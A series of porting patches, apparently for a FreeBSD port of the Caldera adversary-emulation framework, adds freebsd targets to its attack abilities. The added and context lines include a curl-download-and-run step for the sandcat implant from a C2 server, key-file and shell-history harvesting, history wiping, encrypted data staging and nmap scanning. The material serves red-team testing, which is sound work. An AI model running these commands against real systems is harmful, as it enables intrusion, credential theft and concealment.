+++ plugins/response/data/abilities/response/02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml
|
||||
@@ -8,7 +8,7 @@
|
||||
attack_id: x
|
||||
name: x
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
kill -9 #{host.pid.unauthorized}
|
||||
@@ -25,4 +25,4 @@
|
||||
taskkill /pid #{host.pid.unauthorized} /f
|
||||
requirements:
|
||||
- plugins.stockpile.app.requirements.paw_provenance:
|
||||
- - source: host.pid.unauthorized
|
||||
\ No newline at end of file
|
||||
+ - source: host.pid.unauthorized
|
||||
|
|
@ -0,0 +1,18 @@
|
|||
--- plugins/response/data/abilities/response/2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml.orig 2021-10-13 20:41:40 UTC
|
||||
+++ plugins/response/data/abilities/response/2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml
|
||||
@@ -7,7 +7,7 @@
|
||||
attack_id: x
|
||||
name: x
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
if ! test -f hosts_backup; then cp /etc/hosts hosts_backup; fi;
|
||||
@@ -27,4 +27,4 @@
|
||||
if (-not (Test-Path -Path .\hosts_backup)) { Copy-Item -Path c:\windows\system32\drivers\etc\hosts -Destination .\hosts_backup; };
|
||||
Add-Content c:\windows\system32\drivers\etc\hosts "127.0.0.1`t#{remote.suspicious.url}";
|
||||
cleanup: |
|
||||
- Move-Item -Path .\hosts_backup -Destination c:\windows\system32\drivers\etc\hosts -Force
|
||||
\ No newline at end of file
|
||||
+ Move-Item -Path .\hosts_backup -Destination c:\windows\system32\drivers\etc\hosts -Force
|
||||
|
|
@ -0,0 +1,18 @@
|
|||
--- plugins/response/data/abilities/response/32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml.orig 2021-10-13 20:41:40 UTC
|
||||
+++ plugins/response/data/abilities/response/32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml
|
||||
@@ -7,7 +7,7 @@
|
||||
attack_id: x
|
||||
name: x
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
crontab -u #{host.user.name} -l > temp_crontab;
|
||||
@@ -35,4 +35,4 @@
|
||||
edge: has_new_cronjob
|
||||
target: host.new.cronjob
|
||||
- plugins.stockpile.app.requirements.paw_provenance:
|
||||
- - source: host.new.cronjob
|
||||
\ No newline at end of file
|
||||
+ - source: host.new.cronjob
|
||||
|
|
@ -0,0 +1,18 @@
|
|||
--- plugins/response/data/abilities/response/bf01fdc9-d801-4461-81df-e511efb3c1fc.yml.orig 2021-10-13 20:41:40 UTC
|
||||
+++ plugins/response/data/abilities/response/bf01fdc9-d801-4461-81df-e511efb3c1fc.yml
|
||||
@@ -7,7 +7,7 @@
|
||||
name: x
|
||||
repeatable: False
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
directory="#{directory.sensitive.path}";
|
||||
@@ -40,4 +40,4 @@
|
||||
- plugins.stockpile.app.requirements.paw_provenance:
|
||||
- source: directory.sensitive.backup
|
||||
- plugins.stockpile.app.requirements.paw_provenance:
|
||||
- - source: directory.sensitive.path
|
||||
\ No newline at end of file
|
||||
+ - source: directory.sensitive.path
|
||||
|
|
@ -0,0 +1,18 @@
|
|||
--- plugins/response/data/abilities/response/e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml.orig 2021-10-13 20:41:40 UTC
|
||||
+++ plugins/response/data/abilities/response/e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml
|
||||
@@ -7,7 +7,7 @@
|
||||
name: x
|
||||
repeatable: False
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
cp -f /tmp/sensitive_file_backups/#{file.backup.name} #{file.sensitive.path}
|
||||
@@ -31,4 +31,4 @@
|
||||
- plugins.stockpile.app.requirements.paw_provenance:
|
||||
- source: file.backup.name
|
||||
- plugins.stockpile.app.requirements.paw_provenance:
|
||||
- - source: file.sensitive.path
|
||||
\ No newline at end of file
|
||||
+ - source: file.sensitive.path
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/response/data/abilities/setup/243053d2-13c1-47f0-832d-6ef02ba95e1a.yml.orig 2021-10-13 20:41:40 UTC
|
||||
+++ plugins/response/data/abilities/setup/243053d2-13c1-47f0-832d-6ef02ba95e1a.yml
|
||||
@@ -7,7 +7,7 @@
|
||||
name: x
|
||||
repeatable: False
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
mkdir -p /tmp/sensitive_file_backups;
|
||||
|
|
@ -0,0 +1,18 @@
|
|||
--- plugins/response/data/abilities/setup/2ed3c315-2022-499e-a844-1bbd119d0abe.yml.orig 2021-10-13 20:41:40 UTC
|
||||
+++ plugins/response/data/abilities/setup/2ed3c315-2022-499e-a844-1bbd119d0abe.yml
|
||||
@@ -7,7 +7,7 @@
|
||||
name: x
|
||||
repeatable: False
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
output="";
|
||||
@@ -87,4 +87,4 @@
|
||||
}
|
||||
requirements:
|
||||
- plugins.response.app.requirements.source_fact:
|
||||
- - source: directory.sensitive.path
|
||||
\ No newline at end of file
|
||||
+ - source: directory.sensitive.path
|
||||
|
|
@ -0,0 +1,18 @@
|
|||
--- plugins/response/data/abilities/setup/34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml.orig 2021-10-13 20:41:40 UTC
|
||||
+++ plugins/response/data/abilities/setup/34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml
|
||||
@@ -7,7 +7,7 @@
|
||||
name: x
|
||||
repeatable: False
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
mkdir -p /tmp/sensitive_file_backups;
|
||||
@@ -67,4 +67,4 @@
|
||||
Remove-Item -Recurse -Force C:\Users\Public\sensitive_file_backups;
|
||||
requirements:
|
||||
- plugins.response.app.requirements.source_fact:
|
||||
- - source: file.sensitive.path
|
||||
\ No newline at end of file
|
||||
+ - source: file.sensitive.path
|
||||
|
|
@ -0,0 +1,18 @@
|
|||
--- plugins/response/data/abilities/setup/622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml.orig 2021-10-13 20:41:40 UTC
|
||||
+++ plugins/response/data/abilities/setup/622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml
|
||||
@@ -7,7 +7,7 @@
|
||||
name: x
|
||||
repeatable: False
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
mkdir -p /tmp/sensitive_file_backups;
|
||||
@@ -104,4 +104,4 @@
|
||||
then rm -f $file;
|
||||
fi;
|
||||
done;
|
||||
- rm -rf /tmp/sensitive_file_backups;
|
||||
\ No newline at end of file
|
||||
+ rm -rf /tmp/sensitive_file_backups;
|
||||
|
|
@ -0,0 +1,18 @@
|
|||
--- plugins/response/data/abilities/setup/ba907d7a-b334-47e7-b652-4e481b5aa534.yml.orig 2021-10-13 20:41:40 UTC
|
||||
+++ plugins/response/data/abilities/setup/ba907d7a-b334-47e7-b652-4e481b5aa534.yml
|
||||
@@ -7,7 +7,7 @@
|
||||
attack_id: x
|
||||
name: x
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
echo '' > /tmp/cron_jobs;
|
||||
@@ -32,4 +32,4 @@
|
||||
cat /tmp/cron_jobs | sort > /tmp/baseline_cronjobs_list.txt;
|
||||
rm /tmp/cron_jobs;
|
||||
cleanup: |
|
||||
- rm -f /tmp/baseline_cronjobs_list.txt
|
||||
\ No newline at end of file
|
||||
+ rm -f /tmp/baseline_cronjobs_list.txt
|
||||
|
|
@ -0,0 +1,18 @@
|
|||
--- plugins/response/data/abilities/setup/df9d2b83-b40f-4167-af75-31ddde59af7e.yml.orig 2021-10-13 20:41:40 UTC
|
||||
+++ plugins/response/data/abilities/setup/df9d2b83-b40f-4167-af75-31ddde59af7e.yml
|
||||
@@ -7,7 +7,7 @@
|
||||
name: x
|
||||
repeatable: False
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
mkdir -p /tmp/sensitive_file_backups;
|
||||
@@ -100,4 +100,4 @@
|
||||
do if [ ! -s $file ];
|
||||
then rm -f $file;
|
||||
fi;
|
||||
- done;
|
||||
\ No newline at end of file
|
||||
+ done;
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/response/data/abilities/setup/f313a0d7-2327-4f69-8da4-a6efd6135121.yml.orig 2021-10-13 20:41:40 UTC
|
||||
+++ plugins/response/data/abilities/setup/f313a0d7-2327-4f69-8da4-a6efd6135121.yml
|
||||
@@ -7,7 +7,7 @@
|
||||
name: x
|
||||
repeatable: False
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
output="";
|
||||
|
|
@ -0,0 +1,14 @@
|
|||
--- plugins/sandcat/app/sand_svc.py.orig 2022-07-20 19:48:00 UTC
|
||||
+++ plugins/sandcat/app/sand_svc.py
|
||||
@@ -56,7 +56,10 @@ class SandService(BaseService):
|
||||
),
|
||||
linux=dict(
|
||||
cflags='CGO_ENABLED=1'
|
||||
- )
|
||||
+ ),
|
||||
+ freebsd=dict(
|
||||
+ cflags='CGO_ENABLED=1'
|
||||
+ ),
|
||||
)
|
||||
if which('go') is not None:
|
||||
if platform in compile_options.keys():
|
||||
|
|
@ -0,0 +1,45 @@
|
|||
--- plugins/sandcat/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml.orig 2022-07-20 19:48:00 UTC
|
||||
+++ plugins/sandcat/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml
|
||||
@@ -80,6 +80,42 @@
|
||||
curl -s -X POST -H "file:sandcat.go" -H "platform:linux" -H "gocat-extensions:proxy_http" -H "includeProxyPeers:HTTP" $server/file/download > #{agents.implant_name};
|
||||
chmod +x #{agents.implant_name};
|
||||
./#{agents.implant_name} -server $server -listenP2P -v
|
||||
+ freebsd:
|
||||
+ sh:
|
||||
+ command: |
|
||||
+ server="#{app.contact.http}";
|
||||
+ curl -s -X POST -H "file:sandcat.go" -H "platform:freebsd" $server/file/download > #{agents.implant_name};
|
||||
+ chmod +x #{agents.implant_name};
|
||||
+ ./#{agents.implant_name} -server $server -group red -v
|
||||
+ variations:
|
||||
+ - description: Deploy as a blue-team agent instead of red
|
||||
+ command: |
|
||||
+ server="#{app.contact.http}";
|
||||
+ agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:freebsd" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
|
||||
+ nohup ./$agent -server $server -group blue &
|
||||
+ - description: Download with a random name and start as a background process
|
||||
+ command: |
|
||||
+ server="#{app.contact.http}";
|
||||
+ agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:freebsd" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
|
||||
+ nohup ./$agent -server $server &
|
||||
+ - description: Compile red-team agent with a comma-separated list of extensions (requires GoLang).
|
||||
+ command: |
|
||||
+ server="#{app.contact.http}";
|
||||
+ curl -s -X POST -H "file:sandcat.go" -H "platform:freebsd" -H "gocat-extensions:#{agent.extensions}" $server/file/download > #{agents.implant_name};
|
||||
+ chmod +x #{agents.implant_name};
|
||||
+ ./#{agents.implant_name} -server $server -group red -v
|
||||
+ - description: Download with GIST C2
|
||||
+ command: |
|
||||
+ server="#{app.contact.http}";
|
||||
+ curl -s -X POST -H "file:sandcat.go" -H "platform:freebsd" -H "gocat-extensions:gist" -H "c2:gist" $server/file/download > #{agents.implant_name};
|
||||
+ chmod +x #{agents.implant_name};
|
||||
+ ./#{agents.implant_name} -c2 GIST -v
|
||||
+ - description: Deploy as a P2P agent with known peers included in compiled agent
|
||||
+ command: |
|
||||
+ server="#{app.contact.http}";
|
||||
+ curl -s -X POST -H "file:sandcat.go" -H "platform:freebsd" -H "gocat-extensions:proxy_http" -H "includeProxyPeers:HTTP" $server/file/download > #{agents.implant_name};
|
||||
+ chmod +x #{agents.implant_name};
|
||||
+ ./#{agents.implant_name} -server $server -listenP2P -v
|
||||
windows:
|
||||
psh:
|
||||
command: |
|
||||
|
|
@ -0,0 +1,16 @@
|
|||
--- plugins/sandcat/update-agents.sh.orig 2022-07-20 19:48:00 UTC
|
||||
+++ plugins/sandcat/update-agents.sh
|
||||
@@ -1,10 +1,11 @@
|
||||
-#!/bin/bash
|
||||
+#!/bin/sh
|
||||
# generates payloads for each os
|
||||
|
||||
-function build() {
|
||||
+build() {
|
||||
GOOS=windows go build -o ../payloads/sandcat.go-windows -ldflags="-s -w" sandcat.go
|
||||
GOOS=linux go build -o ../payloads/sandcat.go-linux -ldflags="-s -w" sandcat.go
|
||||
GOOS=darwin go build -o ../payloads/sandcat.go-darwin -ldflags="-s -w" sandcat.go
|
||||
+GOOS=freebsd go build -o ../payloads/sandcat.go-freebsd -ldflags="-s -w" sandcat.go
|
||||
}
|
||||
cd gocat && build
|
||||
cd ..
|
||||
|
|
@ -0,0 +1,12 @@
|
|||
--- plugins/stockpile/app/obfuscators/base64_basic.py.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/app/obfuscators/base64_basic.py
|
||||
@@ -10,7 +10,8 @@ class Obfuscation(BaseObfuscator):
|
||||
return dict(
|
||||
windows=['psh'],
|
||||
darwin=['sh'],
|
||||
- linux=['sh']
|
||||
+ linux=['sh'],
|
||||
+ freebsd=['sh']
|
||||
)
|
||||
|
||||
""" EXECUTORS """
|
||||
|
|
@ -0,0 +1,12 @@
|
|||
--- plugins/stockpile/app/obfuscators/base64_jumble.py.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/app/obfuscators/base64_jumble.py
|
||||
@@ -14,7 +14,8 @@ class Obfuscation(BaseObfuscator):
|
||||
return dict(
|
||||
windows=['psh'],
|
||||
darwin=['sh'],
|
||||
- linux=['sh']
|
||||
+ linux=['sh'],
|
||||
+ freebsd=['sh']
|
||||
)
|
||||
|
||||
def run(self, link, **kwargs):
|
||||
|
|
@ -0,0 +1,12 @@
|
|||
--- plugins/stockpile/app/obfuscators/base64_no_padding.py.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/app/obfuscators/base64_no_padding.py
|
||||
@@ -8,7 +8,8 @@ class Obfuscation(BaseObfuscator):
|
||||
return dict(
|
||||
windows=['psh'],
|
||||
darwin=['sh'],
|
||||
- linux=['sh']
|
||||
+ linux=['sh'],
|
||||
+ freebsd=['sh']
|
||||
)
|
||||
|
||||
def run(self, link, **kwargs):
|
||||
|
|
@ -0,0 +1,12 @@
|
|||
--- plugins/stockpile/app/obfuscators/caesar_cipher.py.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/app/obfuscators/caesar_cipher.py
|
||||
@@ -10,7 +10,8 @@ class Obfuscation(BaseObfuscator):
|
||||
return dict(
|
||||
windows=['psh'],
|
||||
darwin=['sh'],
|
||||
- linux=['sh']
|
||||
+ linux=['sh'],
|
||||
+ freebsd=['sh']
|
||||
)
|
||||
|
||||
""" EXECUTORS """
|
||||
|
|
@ -0,0 +1,12 @@
|
|||
--- plugins/stockpile/app/obfuscators/steganography.py.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/app/obfuscators/steganography.py
|
||||
@@ -14,7 +14,8 @@ class Obfuscation(BaseObfuscator):
|
||||
def supported_platforms(self):
|
||||
return dict(
|
||||
darwin=['sh'],
|
||||
- linux=['sh']
|
||||
+ linux=['sh'],
|
||||
+ freebsd=['sh']
|
||||
)
|
||||
|
||||
""" EXECUTORS """
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml
|
||||
@@ -15,7 +15,7 @@
|
||||
parsers:
|
||||
plugins.stockpile.app.parsers.ssh:
|
||||
- source: remote.ssh.cmd
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
pip install -q stormssh 2> /dev/null && storm list | sed 's/\x1b\[[0-9;]*m//g'
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/collection/10fad81e-3f68-47be-83b6-fbee7711c6a9.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/collection/10fad81e-3f68-47be-83b6-fbee7711c6a9.yml
|
||||
@@ -33,7 +33,7 @@
|
||||
parsers:
|
||||
plugins.stockpile.app.parsers.basic:
|
||||
- source: host.dir.staged
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
chmod +x ./file_search.sh; ./file_search.sh --extensions '#{linux.included.extensions}'
|
||||
|
|
@ -0,0 +1,18 @@
|
|||
--- plugins/stockpile/data/abilities/collection/30a8cf10-73dc-497c-8261-a64cc9e91505.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/collection/30a8cf10-73dc-497c-8261-a64cc9e91505.yml
|
||||
@@ -8,7 +8,7 @@
|
||||
attack_id: T1560.001
|
||||
name: "Archive Collected Data: Archive via Utility"
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
tar -C #{host.dir.staged} -czf - . | gpg -c --pinentry-mode=loopback --passphrase #{host.archive.password} > #{host.dir.staged}.tar.gz.gpg && echo #{host.dir.staged}.tar.gz.gpg
|
||||
@@ -29,4 +29,4 @@
|
||||
- source: host.dir.compress
|
||||
requirements:
|
||||
- plugins.stockpile.app.requirements.paw_provenance:
|
||||
- - source: host.dir.staged
|
||||
\ No newline at end of file
|
||||
+ - source: host.dir.staged
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml
|
||||
@@ -12,7 +12,7 @@
|
||||
sh:
|
||||
command: |
|
||||
cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/collection/6469befa-748a-4b9c-a96d-f191fde47d89.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/collection/6469befa-748a-4b9c-a96d-f191fde47d89.yml
|
||||
@@ -17,7 +17,7 @@
|
||||
parsers:
|
||||
plugins.stockpile.app.parsers.basic:
|
||||
- source: host.dir.staged
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
mkdir -p staged && echo $PWD/staged
|
||||
|
|
@ -0,0 +1,18 @@
|
|||
--- plugins/stockpile/data/abilities/collection/720a3356-eee1-4015-9135-0fc08f7eb2d5.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/collection/720a3356-eee1-4015-9135-0fc08f7eb2d5.yml
|
||||
@@ -6,7 +6,7 @@
|
||||
attack_id: T1005
|
||||
name: Data from Local System
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
for directoryname in $(find /home/ -name '.git' -type d 2>/dev/null | head -5); do
|
||||
@@ -21,4 +21,4 @@
|
||||
Get-ChildItem C:\Users -Attributes Directory+Hidden -ErrorAction SilentlyContinue -Filter ".git" -Recurse | foreach {$_.parent.FullName} | Select-Object; exit 0;
|
||||
parsers:
|
||||
plugins.stockpile.app.parsers.basic:
|
||||
- - source: host.dir.git
|
||||
\ No newline at end of file
|
||||
+ - source: host.dir.git
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/collection/89955f55-529d-4d58-bed4-fed9e42515ec.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/collection/89955f55-529d-4d58-bed4-fed9e42515ec.yml
|
||||
@@ -12,7 +12,7 @@
|
||||
sh:
|
||||
command: |
|
||||
curl #{remote.host.socket}
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
curl #{remote.host.socket}
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml
|
||||
@@ -27,7 +27,7 @@
|
||||
- source: host.file.path
|
||||
edge: has_extension
|
||||
target: file.sensitive.extension
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
find / -name '*.#{file.sensitive.extension}' -type f -not -path '*/\.*' -size -500k 2>/dev/null | head -5
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/collection/b007fe0c-c6b0-4fda-915c-255bbc070de2.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/collection/b007fe0c-c6b0-4fda-915c-255bbc070de2.yml
|
||||
@@ -16,7 +16,7 @@
|
||||
psh,pwsh:
|
||||
command: |
|
||||
Get-Clipboard -raw
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
xclip -o
|
||||
|
|
@ -0,0 +1,15 @@
|
|||
--- plugins/stockpile/data/abilities/command-and-control/0ab383be-b819-41bf-91b9-1bd4404d83bf.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/command-and-control/0ab383be-b819-41bf-91b9-1bd4404d83bf.yml
|
||||
@@ -24,3 +24,12 @@
|
||||
python ragdoll.py -W $server#{app.contact.html}
|
||||
cleanup: |
|
||||
pkill -f ragdoll
|
||||
+ freebsd:
|
||||
+ sh:
|
||||
+ command: |
|
||||
+ server="#{app.contact.http}";
|
||||
+ curl -s -X POST -H "file:ragdoll.py" -H "platform:freebsd" $server/file/download > ragdoll.py;
|
||||
+ pip install requests beautifulsoup4;
|
||||
+ python ragdoll.py -W $server#{app.contact.html}
|
||||
+ cleanup: |
|
||||
+ pkill -f ragdoll
|
||||
|
|
@ -0,0 +1,12 @@
|
|||
--- plugins/stockpile/data/abilities/credential-access/422526ec-27e9-429a-995b-c686a29561a4.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/credential-access/422526ec-27e9-429a-995b-c686a29561a4.yml
|
||||
@@ -20,3 +20,9 @@
|
||||
parsers:
|
||||
plugins.stockpile.app.parsers.ssh:
|
||||
- source: remote.ssh.cmd
|
||||
+ freebsd:
|
||||
+ sh:
|
||||
+ command: cat ~/.history
|
||||
+ parsers:
|
||||
+ plugins.stockpile.app.parsers.ssh:
|
||||
+ - source: remote.ssh.cmd
|
||||
|
|
@ -0,0 +1,13 @@
|
|||
--- plugins/stockpile/data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml
|
||||
@@ -19,7 +19,7 @@
|
||||
sh:
|
||||
command: |
|
||||
for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /Users -maxdepth 3 -name "*${i}" 2>/dev/null;done;
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
- for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /etc -maxdepth 3 -name "*${i}" 2>/dev/null;done;
|
||||
\ No newline at end of file
|
||||
+ for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /etc -maxdepth 3 -name "*${i}" 2>/dev/null;done;
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/defense-evasion/36eecb80-ede3-442b-8774-956e906aff02.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/defense-evasion/36eecb80-ede3-442b-8774-956e906aff02.yml
|
||||
@@ -11,7 +11,7 @@
|
||||
darwin:
|
||||
sh:
|
||||
command: sleep 60
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: sleep 60
|
||||
windows:
|
||||
|
|
@ -0,0 +1,15 @@
|
|||
--- plugins/stockpile/data/abilities/defense-evasion/43b3754c-def4-4699-a673-1d85648fda6a.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/defense-evasion/43b3754c-def4-4699-a673-1d85648fda6a.yml
|
||||
@@ -16,6 +16,10 @@
|
||||
sh:
|
||||
command: |
|
||||
> $HOME/.bash_history && unset HISTFILE
|
||||
+ freebsd:
|
||||
+ sh:
|
||||
+ command: |
|
||||
+ > $HOME/.history && set history = 0
|
||||
windows:
|
||||
psh:
|
||||
- command: Clear-History;Clear
|
||||
\ No newline at end of file
|
||||
+ command: Clear-History;Clear
|
||||
|
|
@ -0,0 +1,17 @@
|
|||
--- plugins/stockpile/data/abilities/defense-evasion/4cd4eb44-29a7-4259-91ae-e457b283a880.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/defense-evasion/4cd4eb44-29a7-4259-91ae-e457b283a880.yml
|
||||
@@ -12,11 +12,11 @@
|
||||
sh:
|
||||
cleanup: |
|
||||
rm #{payload}
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
cleanup: |
|
||||
rm #{payload}
|
||||
windows:
|
||||
psh,pwsh:
|
||||
cleanup: |
|
||||
- Remove-Item -Force -Path "#{payload}"
|
||||
\ No newline at end of file
|
||||
+ Remove-Item -Force -Path "#{payload}"
|
||||
|
|
@ -0,0 +1,15 @@
|
|||
--- plugins/stockpile/data/abilities/defense-evasion/5f844ac9-5f24-4196-a70d-17f0bd44a934.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/defense-evasion/5f844ac9-5f24-4196-a70d-17f0bd44a934.yml
|
||||
@@ -25,9 +25,9 @@
|
||||
path="$(pwd)/#{exe_name}";
|
||||
num_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep "$path"; done | wc -l);
|
||||
if [ "$num_processes" -le 1 ]; then /bin/rm -f "$path"; fi;
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
path="$(pwd)/#{exe_name}";
|
||||
num_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep "$path"; done | wc -l);
|
||||
- if [ "$num_processes" -le 1 ]; then /bin/rm -f "$path"; fi;
|
||||
\ No newline at end of file
|
||||
+ if [ "$num_processes" -le 1 ]; then /bin/rm -f "$path"; fi;
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/discovery/30732a56-4a23-4307-9544-09caf2ed29d5.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/discovery/30732a56-4a23-4307-9544-09caf2ed29d5.yml
|
||||
@@ -12,7 +12,7 @@
|
||||
sh:
|
||||
command: |
|
||||
find / -type d -user #{host.user.name} \( -perm -g+w -or -perm -o+w \) 2>/dev/null -exec ls -adl {} \;
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
find / -type d -user #{host.user.name} \( -perm -g+w -or -perm -o+w \) 2>/dev/null -exec ls -adl {} \;
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/discovery/335cea7b-bec0-48c6-adfb-6066070f5f68.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/discovery/335cea7b-bec0-48c6-adfb-6066070f5f68.yml
|
||||
@@ -12,7 +12,7 @@
|
||||
sh:
|
||||
command: |
|
||||
ps
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
ps
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/stockpile/data/abilities/discovery/3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml.orig 2022-09-14 02:24:22 UTC
|
||||
+++ plugins/stockpile/data/abilities/discovery/3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml
|
||||
@@ -12,7 +12,7 @@
|
||||
sh:
|
||||
command: |
|
||||
nmap -sV -p #{remote.host.port} #{remote.host.ip}
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
